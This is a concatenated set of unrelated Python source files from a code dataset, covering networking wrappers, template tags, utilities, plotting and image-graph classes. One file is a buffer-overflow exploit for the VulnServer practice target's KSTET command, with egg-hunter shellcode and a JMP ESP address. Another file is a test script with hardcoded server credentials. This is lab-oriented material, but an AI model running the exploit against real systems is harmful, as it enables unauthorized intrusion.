_network.NoSuchNetwork\nNetworkType = _network.NetworkType\nNetworkIdType = _network.NetworkIdType\n\nadd_router_interface = _router.add_router_interface\ncreate_router = _router.create_router\ndelete_router = _router.delete_router\nget_ovs_router_namespace = _router.get_ovs_router_namespace\nget_router = _router.get_router\nget_router_id = _router.get_router_id\nremove_router_interface = _router.remove_router_interface\nwait_for_master_and_backup_agents = _router.wait_for_master_and_backup_agents\nRouterType = _router.RouterType\nRouterIdType = _router.RouterIdType\nNoSuchRouter = _router.NoSuchRouter\n\ncreate_subnet = _subnet.create_subnet\ndelete_subnet = _subnet.delete_subnet\nensure_subnet_gateway = _subnet.ensure_subnet_gateway\nget_subnet = _subnet.get_subnet\nget_subnet_id = _subnet.get_subnet_id\nfind_subnet = _subnet.find_subnet\nlist_subnets = _subnet.list_subnets\nSubnetType = _subnet.SubnetType\nSubnetIdType = _subnet.SubnetIdType\nNoSuchSubnet = _subnet.NoSuchSubnet\n","sub_path":"tobiko/openstack/neutron/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"443748148","text":"import requests\n\nfrom mtxapi.api.Base_Api import Base_Api\n\n\nclass Mtx_Safe(Base_Api):\n\n def login(self):\n url = 'http://121.42.15.146:9090/mtx/index.php?s=/index/user/login.html'\n headers = {\n 'X-Requested-With': 'XMLHttpRequest',\n }\n data = {\n 'accounts': 'li40',\n 'pwd': '123456'\n }\n res = requests.post(url=url, headers=headers, data=data)\n print(res.cookies)\n return res.cookies\n\n def safe(self,my,new,confirm):\n path = '/mtx/index.php?s=/index/safety/loginpwdupdate.html'\n data = {\n \"my_pwd\": my,\n \"new_pwd\": new,\n \"confirm_new_pwd\": confirm\n }\n res = self.mtx_post(path,data)\n return res\n\n def safe_no(self):\n \"\"\"\n 没有继承\n :return:\n \"\"\"\n url = \"http://121.42.15.146:9090/mtx/index.php?s=/index/safety/loginpwdupdate.html\"\n headers = {\"X-Requested-With\":\"XMLHttpRequest\"}\n data = {\n \"my_pwd\": '123456',\n \"new_pwd\": '123456',\n \"confirm_new_pwd\": '123456'\n }\n res = requests.post(url=url,headers=headers,cookies=self.login(),data=data)\n print(res)\n print(res.text)\n\n\n\nif __name__ == '__main__':\n obj = Mtx_Safe()\n obj.safe_no()","sub_path":"mtxapi/api/Mtx_Safe.py","file_name":"Mtx_Safe.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"29133739","text":"\"\"\"More pythonic for tag for python mode of liquidpy\"\"\"\nfrom lark import v_args\nfrom .transformer import TagTransformer\nfrom .inherited import Tag, tag_manager\nfrom ...tags.transformer import render_segment\n\n@v_args(inline=True)\nclass TagForTransformer(TagTransformer):\n \"\"\"Transformer for tag for\"\"\"\n # pylint: disable=no-self-use\n def tag_for(self, varname, *args):\n \"\"\"Transformer for tag for\"\"\"\n varnames = (varname, *args[:-1])\n return tuple(str(vname) for vname in varnames), args[-1]\n\n@tag_manager.register\nclass TagFor(Tag):\n \"\"\"The for tag\n\n Attributes:\n flag_break: The flag for break statement\n flag_continue: The flag for continue statement\n cycles: The cycle object for cycle tags\n \"\"\"\n __slots__ = Tag.__slots__ + ('flag_break', 'flag_continue')\n\n START = 'tag_for'\n GRAMMAR = 'tag_for: var (\",\" var)* \"in\" output'\n TRANSFORMER = TagForTransformer()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.flag_break = False # type: bool\n self.flag_continue = False # type: bool\n\n\n def _render(self, local_vars, global_vars):\n # type: (dict, dict) -> str\n rendered = ''\n\n varnames, value = self.parsed\n value = render_segment(value, local_vars, global_vars)\n local_vars_inside = local_vars.copy()\n for elem in value:\n if not isinstance(elem, (tuple, list)):\n elem = (elem,)\n for i, varname in enumerate(varnames):\n local_vars_inside[varname] = elem[i]\n\n for child in self.children:\n child_rendered, _ = child.render(local_vars_inside,\n global_vars)\n rendered += child_rendered\n if self.flag_continue or self.flag_break:\n self.flag_continue = False\n break\n if self.flag_break:\n break\n\n if not value or not self.flag_break: # for ... else\n rendered += self._render_next(local_vars, global_vars, True)\n return rendered\n","sub_path":"liquid/python/tags/tag_for.py","file_name":"tag_for.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"427855063","text":"#!/usr/bin/env python\r\n# -*- encoding: utf-8 -*-\r\n#\r\n# Copyright (c) 2016 Stephen Bunn \r\n# MIT License \r\n\r\n\"\"\"\r\nutil\r\n.. module:: scrab\r\n :platform: Linux, MacOSX, Win32\r\n :synopsis:\r\n :created: 2016-09-14T20:50:27-04:00\r\n :modified: 2016-09-14T20:50:27-04:00\r\n.. moduleauthor:: Stephen Bunn (ritashugisha@gmail.com)\r\n\r\n\"\"\"\r\n\r\nimport os\r\nimport hashlib\r\nimport webbrowser\r\nimport subprocess\r\nimport urllib.request\r\n\r\n\r\ndef url_exists(url, timeout=5):\r\n \"\"\" Determines if a url exists.\r\n :param url: The url to check\r\n :type url: str\r\n :param timeout: Seconds to wait for request to respond\r\n :type timeout: int\r\n :rtype: bool\r\n \"\"\"\r\n\r\n try:\r\n return (urllib.request.urlopen(url, timeout=timeout).code == 200)\r\n except (ValueError, urllib.error.URLError, urllib.request.HTTPError):\r\n pass\r\n return False\r\n\r\n\r\ndef download(url, filepath, overwrite=False):\r\n \"\"\" Download a file from a url to a given filepath.\r\n :param url: The URL to retrieve\r\n :type url: str\r\n :param filepath: The filepath to store the retrieved content\r\n :type filepath: str\r\n :param overwrite: Flag to indiciate if files should be overwritten\r\n :type overwrite: bool\r\n :rtyp: bool\r\n \"\"\"\r\n\r\n filepath = os.path.abspath(filepath)\r\n if isinstance(url, str) and len(url) > 0:\r\n resp = urllib.request.urlopen(url)\r\n if resp.getcode() != 200:\r\n raise ValueError((\r\n \"invalid url read response, '{resp}'\"\r\n ).format(resp=resp))\r\n if os.path.isdir(os.path.dirname(filepath)):\r\n if overwrite or not os.path.isfile(filepath):\r\n # Downloading file to filepath\r\n with open(filepath, 'w') as fp:\r\n fp.write(resp.read().decode('utf-8'))\r\n return True\r\n # File already exists, not overwriting\r\n return False\r\n # Parent directory to store file does not exists\r\n return False\r\n return False\r\n\r\n\r\ndef browser_open(url, window=True):\r\n \"\"\" Wrapper for opening a browser window to a given url.\r\n :param url: The URL to open\r\n :type url: str\r\n :param window: Flag to indicate if URL should be opened in new window\r\n :type window: bool\r\n \"\"\"\r\n\r\n webbrowser.open(url, new=(1 if window else 2))\r\n\r\n\r\ndef run_subprocess(process):\r\n \"\"\" Run a subprocess.\r\n :param process: List or string command to be run\r\n :type process: list/str\r\n :rtype: tuple\r\n \"\"\"\r\n\r\n return subprocess.Popen((\r\n [str(_) for _ in process]\r\n if (isinstance(process, list) and len(process) > 0) else\r\n [str(process)]\r\n ),\r\n shell=isinstance(process, str),\r\n stdout=subprocess.PIPE,\r\n stderr=subprocess.PIPE\r\n ).communicate()\r\n\r\n\r\ndef checksum(hash_algorithm, filepath, chunksize=4096):\r\n \"\"\" Returns the checksum of a given file.\r\n\r\n :param hashtype: The type of has to generate (md5, sha256, sha512, ...)\r\n :type hashtype: str\r\n :param filepath: The absolute path to the file\r\n :type filepath: str\r\n :param chunksize: The chunksize (bytes) for reading the file (default 4096)\r\n :type: int\r\n :returns: The md5 checksum of the given file\r\n :rtype: str\r\n \"\"\"\r\n\r\n if hash_algorithm in hashlib.algorithms_guaranteed:\r\n\r\n hash_ = getattr(hashlib, hash_algorithm)()\r\n with open(filepath, 'rb') as f:\r\n for chunk in iter(lambda: f.read(chunksize), b''):\r\n hash_.update(chunk)\r\n return hash_.hexdigest()\r\n\r\n raise ValueError((\r\n \"no available algorithm '{hash_algorithm}', \"\r\n \"available are {hashlib.algorithms_guaranteed}\"\r\n ).format(hash_algorithm=hash_algorithm, hashlib=hashlib))\r\n","sub_path":"scrab/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"309974590","text":"# -*- coding: utf-8 -*-\nimport logging\nimport time\nimport six\nimport socket\nfrom datetime import datetime\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef _convert_timestamp(timestamp):\n '''\n :param timestamp: datetime with the timestamp date and time or str in the appropriate format\n :return: string with the corresponding date and time\n '''\n\n if not timestamp:\n return int(time.time())\n elif type(timestamp) is datetime:\n return time.mktime(timestamp.timetuple())\n elif type(timestamp) is str:\n _datetime = datetime.strptime(timestamp[0:19], '%Y-%m-%dT%H:%M:%S')\n return int(time.mktime(_datetime.timetuple()))\n elif type(timestamp) is unicode:\n _datetime = datetime.strptime(timestamp[0:19], '%Y-%m-%dT%H:%M:%S')\n return int(time.mktime(_datetime.timetuple()))\n else:\n logger.info('%s is not a valid timestamp type', type(timestamp))\n raise TypeError\n\n\ndef send_metric(server, port, environment, metric, value, tags=None, timestamp=None):\n '''\n Send metric to graphite\n :param server: server domain name\n :param port: metric server port\n :param environment: current environment (dev, stage, production)\n :param metric: metric name\n :param value: metric value\n :param tags: list of tags in the form [{'key1': value1},...,{'keyN': valueN}]\n :param timestamp: datetime with metric time\n :return:\n '''\n\n # In python3, celery converts datetime to a string.\n ts = _convert_timestamp(timestamp)\n\n metric_path = environment + '.'\n\n if tags:\n for tag in tags:\n for item in tag.items():\n metric_path += item[1] + '.'\n\n metric_path += metric\n\n sock = socket.socket()\n sock.connect((server, int(port)))\n sock.send(six.b(\"%s %f %d\\n\" % (metric_path, value, ts)))\n sock.close()\n","sub_path":"python_metrics_client/graphite.py","file_name":"graphite.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"148019495","text":"class UnionFind:\n\n def __init__(self):\n self.groups = []\n self.parent = dict()\n self.rank = dict()\n\n def make_set(self, elem):\n self.parent[elem] = elem\n self.rank[elem] = 0\n self.groups.append(elem)\n\n def find(self, elem):\n if elem not in self.parent:\n return None\n\n if elem != self.parent[elem]:\n self.parent[elem] = self.find(self.parent[elem])\n return self.parent[elem]\n\n def union(self, u, v):\n root_u = self.find(u)\n root_v = self.find(v)\n\n if root_u == root_v or root_u is None or root_v is None:\n return\n\n if self.rank[root_u] > self.rank[root_v]:\n self.parent[root_v] = root_u\n self.groups.remove(root_v)\n else:\n self.parent[root_u] = root_v\n self.groups.remove(root_u)\n if self.rank[root_u] == self.rank[root_v]:\n self.rank[root_v] += 1\n\n def size(self):\n return len(self.groups)\n","sub_path":"document_generation/union_find.py","file_name":"union_find.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"559072723","text":"import numpy as np\nimport pylab\nimport matplotlib.patches as patches\n\nfrom ray.abstract_ray import ARay\nimport view.matlab.sphere_ellipse_data2D as spell\n\nfrom surfaces.surface import Surface\nfrom surfaces.analitic.plane import Plane\nfrom surfaces.analitic.sphere import Sphere\nfrom surfaces.analitic.ellipse import Ellipse\nfrom surfaces.limited_surface import LimitedSurface\n\n\ndef draw_plane(plane: Plane, color=\"blue\", alpha=0.5):\n # matrix of rotation\n m = [[0, -1],\n [1, 0]]\n # direction vector\n r = np.dot(m, plane.norm_vec([]))\n # coords = vray.collect_point_to_draw(r,)\n point = [ARay.calc_point_of_ray_(r, plane.rad, 10_000),\n ARay.calc_point_of_ray_(r, plane.rad, -10_000)]\n\n line = pylab.Line2D([point[i][0] for i in range(2)],\n [point[i][1] for i in range(2)], color=color, alpha=alpha)\n pylab.gca().add_line(line)\n\n\ndef draw_sphere(sphere: Sphere, color='b', alpha=0.5):\n sphere = pylab.Circle(sphere.center, sphere.r, fill=False, color=color, alpha=alpha)\n pylab.gca().add_patch(sphere)\n\n\ndef draw_ellipse(ellipse: Ellipse, color='b', alpha=0.5):\n ellipse = patches.Ellipse(ellipse.center, 2 * ellipse.abc[0], 2 * ellipse.abc[1], fill=False, color='b', alpha=0.5)\n pylab.gca().add_patch(ellipse)\n\n\ndef draw_limited_plane(plane: LimitedSurface, color=\"blue\", alpha=0.5):\n surface = plane.surface\n if not isinstance(surface, Plane):\n return\n norm = surface.norm_vec(point=[])\n const = np.dot(surface.rad, norm)\n limits = plane.limits\n # keep the unique values\n x = {-(const + limits[1][i] * norm[1]) / norm[0] for i in range(2)}\n y = {-(const + limits[0][i] * norm[0]) / norm[1] for i in range(2)}\n x.update(limits[0])\n y.update(limits[1])\n\n x = list(x)\n y = list(y)\n\n line = None\n belong_points = set()\n for k in range(len(x)):\n for l in range(len(y)):\n point = (x[k], y[l])\n if surface.is_point_belong(point) and plane.is_point_in_limits(point):\n belong_points.add(point)\n\n belong_points = list(belong_points)\n if len(belong_points) == 2:\n line = pylab.Line2D([belong_points[i][0] for i in range(2)],\n [belong_points[i][1] for i in range(2)])\n pylab.gca().add_line(line)\n return\n\n\ndef draw_limited_ellipse(ellipse: LimitedSurface, color='b', alpha=0.5):\n # получаем коэфициенты растяжения по осям\n to_draw = None\n\n # получаем коэфициенты растяжения по осям\n surface = ellipse.surface\n lim = ellipse.limits\n\n if isinstance(surface, Sphere):\n center = surface.center\n to_draw = spell.Sphere_Ellipse_data_2Dview.get_sphere2D(10 ** -2, center, surface.r)\n elif isinstance(surface, Ellipse):\n center = surface.center\n to_draw = spell.Sphere_Ellipse_data_2Dview.get_ellipse2D(10 ** -2, center, surface.abc)\n else:\n return\n\n # quenes\n to_cuting_pre = [to_draw]\n to_cuing_cur = []\n\n for k in range(len(lim)):\n while len(to_cuting_pre) > 0:\n val = to_cuting_pre.pop(0)\n to_cuing_cur.extend(__cut(val, lim, k))\n\n to_cuting_pre = to_cuing_cur\n to_cuing_cur = []\n\n for line in to_cuting_pre:\n pylab.plot(line[0], line[1], color=color, alpha=alpha)\n\n\ndef __cut(to_draw: iter, lim: iter, k: int) -> iter:\n\n # делаем срезы по одной осям\n xy_index_begin = []\n xy_index_end = []\n in_range_prev = False\n i = 0\n for i, val in enumerate(to_draw[k]):\n exp = lim[k][0] <= val and val <= lim[k][1]\n if exp != in_range_prev:\n if exp:\n xy_index_begin.append(i)\n else:\n xy_index_end.append(i)\n in_range_prev = exp\n\n if len(xy_index_end) < len(xy_index_begin):\n xy_index_end.append(len(to_draw[0]))\n\n to_draw2 = []\n for i, j in zip(xy_index_begin, xy_index_end):\n to_draw2.append([])\n to_draw2[len(to_draw2) - 1].append(to_draw[0][i:j])\n to_draw2[len(to_draw2) - 1].append(to_draw[1][i:j])\n return to_draw2\n\n\ndef draw_limits(surface: LimitedSurface, color: str = \"black\", alpha: float = 0.5):\n lim = surface.limits\n planes = [\n Plane([lim[0][0], 0], [1, 0]),\n Plane([lim[0][1], 0], [1, 0]),\n Plane([0, lim[1][0]], [0, 1]),\n Plane([0, lim[1][1]], [0, 1]),\n ]\n for plane in planes:\n draw_plane(plane, color=color, alpha=alpha)\n\n\ndef draw_exist_surface(surface: Surface, color: str = \"blue\", alpha: float = 1.):\n \"\"\"\n draw existing surface: Plane,Sphere,Ellipse and\n LimitedSurface, where surface is limited Plane,Sphere,Ellipse\n :return:\n \"\"\"\n if isinstance(surface, Plane):\n draw_plane(surface, color=color, alpha=alpha)\n elif isinstance(surface, Sphere):\n draw_sphere(surface, color=color, alpha=alpha)\n elif isinstance(surface, Ellipse):\n draw_ellipse(surface, color=color, alpha=alpha)\n elif isinstance(surface, LimitedSurface):\n inner_surface = surface.surface\n if isinstance(inner_surface, Plane):\n draw_limited_plane(surface, color=color, alpha=alpha)\n elif isinstance(inner_surface, (Sphere, Ellipse)):\n draw_limited_ellipse(surface, color=color, alpha=alpha)\n else:\n raise ValueError(\"Not supporting surface \" + str(surface))\n","sub_path":"view/matlab/matlab_surface_view2D.py","file_name":"matlab_surface_view2D.py","file_ext":"py","file_size_in_byte":5451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"349114683","text":"#!/usr/bin/python\nimport socket\n\npayload = \"\"\npayload += \"HACKHACK\"\n\nRHOST = \"\"\n\nRPORT = 9999\n# Address of JMP ESP\nEIP = \"\\xaf\\x11\\x50\\x62\"\negg_hunter = b\"\"\negg_hunter += b\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\"\negg_hunter += b\"\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x48\\x41\\x43\\x4b\"\negg_hunter += b\"\\x89\\xd7\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\nbuffer = \"\"\nbuffer += \"KSTET \"\nbuffer += \"\\x90\" * 2\nbuffer += egg_hunter\nbuffer += \"\\x90\" * (70 - 2 - len(egg_hunter))\nbuffer += EIP\nbuffer += \"\\xeb\\xb4\"\nbuffer += \"\\x90\" * (1000 - len(buffer))\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nprint(\"[*] Connecting to \" + RHOST + \" on port \" + str(RPORT))\nconnection.connect((RHOST, RPORT))\nconnection.recv(1024)\nprint(\"[*] Sending payload\")\nconnection.send(\"STATS \" + payload)\nconnection.close()\nprint(\"[*] Payload had been sent\")\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nprint(\"[*] Connecting to \" + RHOST + \" on port \" + str(RPORT))\nconnection.connect((RHOST, RPORT))\nconnection.recv(1024)\nprint(\"[*] Sending exploit\")\nconnection.send(buffer)\nconnection.close()\nprint(\"[*] Exploit had been sent\")\n","sub_path":"Exploits/VulnServer/Exploits/KSTET-Egg-Hunter.py","file_name":"KSTET-Egg-Hunter.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"567680810","text":"from collections import defaultdict, MutableMapping\nimport itertools\nimport os\nimport warnings\n\nfrom csmapi import csmapi\nimport numpy as np\nimport pandas as pd\n\nfrom plio.io.io_gdal import GeoDataset\nfrom plio.io.isis_serial_number import generate_serial_number\nfrom skimage.transform import resize\nimport shapely\nfrom knoten.csm import generate_latlon_footprint, generate_vrt, create_camera, generate_boundary\n\nfrom autocnet.matcher import cpu_extractor as fe\nfrom autocnet.matcher import cpu_outlier_detector as od\nfrom autocnet.cg import cg\nfrom autocnet.io.db.model import Images, Keypoints, Matches, Cameras, Base, Overlay, Edges, Costs, Points, Measures\nfrom autocnet.io.db.connection import Parent\nfrom autocnet.io import keypoints as io_keypoints\nfrom autocnet.vis.graph_view import plot_node\nfrom autocnet.utils import utils\n\n\nclass Node(dict, MutableMapping):\n \"\"\"\n This class represents a node in a graph and is synonymous with an\n image. The node (image) stores PATH information, an accessor to the\n on-disk data set, and correspondences information that references the image.\n\n\n Attributes\n ----------\n image_name : str\n Name of the image, with extension\n\n image_path : str\n Relative or absolute PATH to the image\n\n geodata : object\n File handle to the object\n\n keypoints : dataframe\n With columns, x, y, and response\n\n nkeypoints : int\n The number of keypoints found for this image\n\n descriptors : ndarray\n 32-bit array of feature descriptors returned by OpenCV\n\n masks : set\n A list of the available masking arrays\n\n ignore : bool\n If the image is flagged as ignored and will be skipped in processing\n\n isis_serial : str\n If the input images have PVL headers, generate an\n ISIS compatible serial number\n \"\"\"\n\n def __init__(self, image_name=None, image_path=None, node_id=None):\n self['image_name'] = image_name\n self['image_path'] = image_path\n self['node_id'] = node_id\n self['hash'] = image_name\n self.masks = pd.DataFrame()\n\n @property\n def camera(self):\n if not hasattr(self, '_camera'):\n self._camera = None\n return self._camera\n\n @camera.setter\n def camera(self, camera):\n self._camera = camera\n\n @property\n def descriptors(self):\n if not hasattr(self, '_descriptors'):\n self._descriptors = None\n return self._descriptors\n\n @descriptors.setter\n def descriptors(self, desc):\n self._descriptors = desc\n\n @property\n def keypoints(self):\n if not hasattr(self, '_keypoints'):\n self._keypoints = pd.DataFrame()\n return self._keypoints\n\n @keypoints.setter\n def keypoints(self, kps):\n self._keypoints = kps\n\n @property\n def ignore(self):\n if not hasattr(self, '_ignore'):\n self._ignore = False\n return self._ignore\n\n @ignore.setter\n def ignore(self, ignore):\n self._ignore = ignore\n\n def __repr__(self):\n return \"\"\"\n NodeID: {}\n Image Name: {}\n Image PATH: {}\n Number Keypoints: {}\n Available Masks : {}\n Type: {}\n \"\"\".format(self['node_id'], self['image_name'], self['image_path'],\n self.nkeypoints, self.masks, self.__class__)\n\n def __hash__(self): #pragma: no cover\n return hash(self['node_id'])\n\n def __gt__(self, other):\n myid = self['node_id']\n oid = other['node_id']\n return myid > oid\n\n def __ge__(self, other):\n myid = self['node_id']\n oid = other['node_id']\n return myid >= oid\n\n def __lt__(self, other):\n myid = self['node_id']\n oid = other['node_id']\n return myid < oid\n\n def __le__(self, other):\n myid = self['node_id']\n oid = other['node_id']\n return myid <= oid\n\n def __str__(self):\n return str(self['node_id'])\n\n def __eq__(self, other):\n return self['node_id'] == other\n\n @classmethod\n def create(cls, image_name, node_id, basepath=None):\n try:\n image_name = os.path.basename(image_name)\n except: pass # Use the input name even if not a valid PATH\n if basepath is not None:\n image_path = os.path.join(basepath, image_name)\n else:\n image_path = image_name\n return cls(image_name, image_path, node_id)\n\n @property\n def geodata(self):\n if not hasattr(self, '_geodata'):\n self._geodata = GeoDataset(self['image_path'])\n return self._geodata\n\n @property\n def footprint(self):\n if not getattr(self, '_footprint', None):\n try:\n self._footprint = shapely.wkt.loads(self.geodata.footprint.GetGeometryRef(0).ExportToWkt())\n except:\n return None\n return self._footprint\n\n @property\n def isis_serial(self):\n \"\"\"\n Generate an ISIS compatible serial number using the data file\n associated with this node. This assumes that the data file\n has a PVL header.\n \"\"\"\n if not hasattr(self, '_isis_serial'):\n try:\n self._isis_serial = generate_serial_number(self['image_path'])\n except:\n self._isis_serial = None\n return self._isis_serial\n\n @property\n def nkeypoints(self):\n try:\n return len(self.keypoints)\n except:\n return 0\n\n def coverage(self):\n \"\"\"\n Determines the area of keypoint coverage\n using the unprojected image, resulting\n in a rough estimation of the percentage area\n being covered.\n\n Returns\n -------\n coverage_area : float\n percentage area covered by the generated\n keypoints\n \"\"\"\n\n points = self.get_keypoint_coordinates()\n hull = cg.convex_hull(points)\n hull_area = hull.volume\n\n max_x = self.geodata.raster_size[0]\n max_y = self.geodata.raster_size[1]\n total_area = max_x * max_y\n\n return hull_area / total_area\n\n def get_byte_array(self, band=1):\n \"\"\"\n Get a band as a 32-bit numpy array\n\n Parameters\n ----------\n band : int\n The band to read, default 1\n \"\"\"\n\n array = self.geodata.read_array(band=band)\n return utils.bytescale(array)\n\n def get_array(self, band=1, **kwargs):\n \"\"\"\n Get a band as a 32-bit numpy array\n\n Parameters\n ----------\n band : int\n The band to read, default 1\n \"\"\"\n\n array = self.geodata.read_array(band=band, **kwargs)\n return array\n\n def get_keypoints(self, index=None):\n \"\"\"\n Return the keypoints for the node. If index is passed, return\n the appropriate subset.\n Parameters\n ----------\n index : iterable\n indices for of the keypoints to return\n Returns\n -------\n : dataframe\n A pandas dataframe of keypoints\n \"\"\"\n if index is not None:\n return self.keypoints.loc[index]\n else:\n return self.keypoints\n\n def get_keypoint_coordinates(self, index=None, homogeneous=False):\n \"\"\"\n Return the coordinates of the keypoints without any ancillary data\n\n Parameters\n ----------\n index : iterable\n indices for of the keypoints to return\n\n homogeneous : bool\n If True, return homogeneous coordinates in the form\n [x, y, 1]. Default: False\n\n Returns\n -------\n : dataframe\n A pandas dataframe of keypoint coordinates\n \"\"\"\n if index is None:\n keypoints = self.keypoints[['x', 'y']]\n else:\n keypoints = self.keypoints.loc[index][['x', 'y']]\n\n if homogeneous:\n keypoints = keypoints.assign(homogeneous = 1)\n return keypoints\n\n def get_raw_keypoint_coordinates(self, index=slice(None)):\n \"\"\"\n The performance of get_keypoint_coordinates can be slow\n due to the ability for fancier indexing. This method\n returns coordinates using numpy array accessors.\n\n Parameters\n ----------\n index : iterable\n positional indices to return from the global keypoints dataframe\n \"\"\"\n return self.keypoints.values[index,:2]\n\n @staticmethod\n def _extract_features(array, *args, **kwargs): # pragma: no cover\n \"\"\"\n Extract features for the node\n\n Parameters\n ----------\n array : ndarray\n\n kwargs : dict\n kwargs passed to autocnet.cpu_extractor.extract_features\n\n \"\"\"\n pass\n\n def extract_features(self, array, xystart=[], camera=None, *args, **kwargs):\n\n new_keypoints, new_descriptors = Node._extract_features(array, *args, **kwargs)\n count = len(self.keypoints)\n\n # If this is a tile, push the keypoints to the correct start xy\n if xystart:\n new_keypoints['x'] += xystart[0]\n new_keypoints['y'] += xystart[1]\n\n concat_kps = pd.concat((self.keypoints, new_keypoints))\n concat_kps.reset_index(inplace=True, drop=True)\n concat_kps.drop_duplicates(inplace=True)\n # Removed duplicated and re-index the merged keypoints\n\n # Update the descriptors to be the same size as the keypoints, maintaining alignment\n if self.descriptors is not None:\n concat = np.concatenate((self.descriptors, new_descriptors))\n else:\n concat = new_descriptors\n new_descriptors = concat[concat_kps.index.values]\n\n self.descriptors = new_descriptors\n self.keypoints = concat_kps.reset_index(drop=True)\n\n lkps = len(self.keypoints)\n\n assert lkps == len(self.descriptors)\n\n if lkps > 0:\n return True\n\n def extract_features_from_overlaps(self, overlaps=[], downsampling=False, tiling=False, *args, **kwargs):\n # iterate through the overlaps\n # check for downsampling or tiling and dispatch as needed to that func\n # that should then dispatch to the extract features func\n pass\n\n def extract_features_with_downsampling(self, downsample_amount,\n array_read_args={}, *args, **kwargs):\n \"\"\"\n Extract interest points for the this node (image) by first downsampling,\n then applying the extractor, and then upsampling the results backin to\n true image space.\n\n Parameters\n ----------\n downsample_amount : int\n The amount to downsample by\n \"\"\"\n array_size = self.geodata.raster_size\n total_size = array_size[0] * array_size[1]\n shape = (int(array_size[0] / downsample_amount),\n int(array_size[1] / downsample_amount))\n array = resize(self.geodata.read_array(**array_read_args), shape, preserve_range=True)\n self.extract_features(array, *args, **kwargs)\n\n self.keypoints['x'] *= downsample_amount\n self.keypoints['y'] *= downsample_amount\n\n if len(self.keypoints) > 0:\n return True\n\n def extract_features_with_tiling(self, tilesize=1000, overlap=500, *args, **kwargs):\n array_size = self.geodata.raster_size\n slices = utils.tile(array_size, tilesize=tilesize, overlap=overlap)\n for s in slices:\n xystart = [s[0], s[1]]\n array = self.geodata.read_array(pixels=s)\n self.extract_features(array, xystart, *args, **kwargs)\n\n if len(self.keypoints) > 0:\n return True\n\n def project_keypoints(self):\n if self.camera is None:\n # Without a camera, it is not possible to project\n warnings.warn('Unable to project points, no camera available.')\n return False\n # Project the sift keypoints to the ground\n def func(row, args):\n camera = args[0]\n imagecoord = csmapi.ImageCoord(float(row[1]), float(row[0]))\n # An elevation at the ellipsoid is plenty accurate for this work\n gnd = getattr(camera, 'imageToGround')(imagecoord, 0)\n return [gnd.x, gnd.y, gnd.z]\n feats = self.keypoints[['x', 'y']].values\n gnd = np.apply_along_axis(func, 1, feats, args=(self.camera, ))\n gnd = pd.DataFrame(gnd, columns=['xm', 'ym', 'zm'], index=self.keypoints.index)\n self.keypoints = pd.concat([self.keypoints, gnd], axis=1)\n\n return True\n\n def load_features(self, in_path, format='npy', **kwargs):\n \"\"\"\n Load keypoints and descriptors for the given image\n from a HDF file.\n\n Parameters\n ----------\n in_path : str or object\n PATH to the hdf file or a HDFDataset object handle\n\n format : {'npy', 'hdf'}\n The format that the features are stored in. Default: npy.\n \"\"\"\n if format == 'npy':\n keypoints, descriptors = io_keypoints.from_npy(in_path)\n elif format == 'hdf':\n keypoints, descriptors = io_keypoints.from_hdf(in_path, **kwargs)\n\n self.keypoints = keypoints\n self.descriptors = descriptors\n\n def save_features(self, out_path):\n \"\"\"\n Save the extracted keypoints and descriptors to\n the given file. By default, the .npz files are saved\n along side the image, e.g. in the same folder as the image.\n\n Parameters\n ----------\n out_path : str or object\n PATH to the directory for output and base file name\n \"\"\"\n if self.keypoints.empty:\n warnings.warn('Node {} has not had features extracted.'.format(self['node_id']))\n return\n\n io_keypoints.to_npy(self.keypoints, self.descriptors,\n out_path + '_{}.npz'.format(self['node_id']))\n\n def plot(self, clean_keys=[], **kwargs): # pragma: no cover\n return plot_node(self, clean_keys=clean_keys, **kwargs)\n\n def _clean(self, clean_keys):\n \"\"\"\n Given a list of clean keys compute the\n mask of valid matches\n\n Parameters\n ----------\n clean_keys : list\n of columns names (clean keys)\n\n Returns\n -------\n matches : dataframe\n A masked view of the matches dataframe\n\n mask : series\n A boolean series to inflate back to the full match set\n \"\"\"\n if self.keypoints.empty:\n raise AttributeError('Keypoints have not been extracted for this node.')\n panel = self.masks\n mask = panel[clean_keys].all(axis=1)\n matches = self.keypoints[mask]\n return matches, mask\n\n def reproject_geom(self, coords): # pragma: no cover\n \"\"\"\n Reprojects a set of latlon coordinates into pixel space using the nodes\n geodata. These are then returned as a shapely polygon\n\n Parameters\n ----------\n coords : ndarray\n (n, 2) array of latlon coordinates\n\n Returns\n ----------\n : object\n A shapely polygon object made using the reprojected coordinates\n \"\"\"\n reproj = []\n\n for x, y in coords:\n reproj.append(self.geodata.latlon_to_pixel(y, x))\n return shapely.geometryPolygon(reproj)\n\nclass NetworkNode(Node):\n def __init__(self, *args, **kwargs):\n super(NetworkNode, self).__init__(*args, **kwargs)\n # If this is the first time that the image is seen, add it to the DB\n self.job_status = defaultdict(dict)\n\n def populate_db(self):\n with self.parent.session_scope() as session:\n res = session.query(Images).filter(Images.path == self['image_path']).first()\n if res:\n # Image already exists\n return\n\n # If the geodata is not valid, do no create an assocaited keypoints file\n # One instance when invalid is during testing.\n if hasattr(self.geodata, 'file_name'):\n kpspath = 